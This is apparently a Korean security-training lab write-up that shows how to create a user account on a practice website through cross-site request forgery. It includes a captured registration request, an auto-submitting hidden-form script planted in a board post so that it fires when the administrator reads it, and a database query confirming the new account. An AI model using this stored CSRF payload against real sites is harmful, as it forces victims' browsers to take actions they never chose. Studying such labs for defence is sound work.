CSRF 를 이용한 회원 가입하기

실습> CSRF를 이용한 회원 가입하기

-- 조건 --
1. 메뉴 
- 홈 -> 회원가입

2. 사용자 정보
아이디: blackhat2
비밀번호: 777777
이름: 블랙햇2
이메일: blackhat2@naver.com
-- 조건 --


1. 분석
POST /registerok.html HTTP/1.1
Host: 192.168.108.101
Content-Length: 96
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.108.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.108.101/register.html
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9
Cookie: PHPSESSID=3ovodk4h07880b72saa165ru34
Connection: close

gopage=%2Fregister.html&userid=abc123&userpw=111111&username=abc123&useremail=abc123%40naver.com


gopage=/register.html
userid=abc123
userpw=111111
username=abc123
useremail=abc123@naver.com

2. 게시판 글 입력
공격자가 아래 내용으로 게시글을 작성한다.

이름 : 공격자
제목 : 회원가입 사용자 생성
비밀번호 : 1
내용 : 
관리자님 안녕하세요.

<form id=csrftest method=POST action=/registerok.html>
<input type=hidden name=gopage value=/register.html>
<input type=hidden name=userid value=blackhat2>
<input type=hidden name=userpw value=777777>
<input type=hidden name=username value=블랙햇2>
<input type=hidden name=useremail value=blackhat2@naver.com>
</form>
<script>document.getElementById("csrftest").submit();</script> 

3. 게시글 확인
관리자가 게시글을 읽는 순간 사용자가 가입이 된다.

4. DB 확인
member 테이블을 확인하면 블랙햇2가 가입된 것을 확인할 수 있다.
MariaDB [mywebsite]> select * from member order by no desc limit 1\G
*************************** 1. row ***************************
       no: 8
 username: 블랙햇2
   userid: blackhat2
 userpass: *9A229395F8379662D1576C5E2CC5EAFA7F726820  <-- 777777
useremail: blackhat2@naver.com
   ipaddr: 192.168.108.1
     date: 2022-01-22 23:43:26
1 row in set (0.00 sec)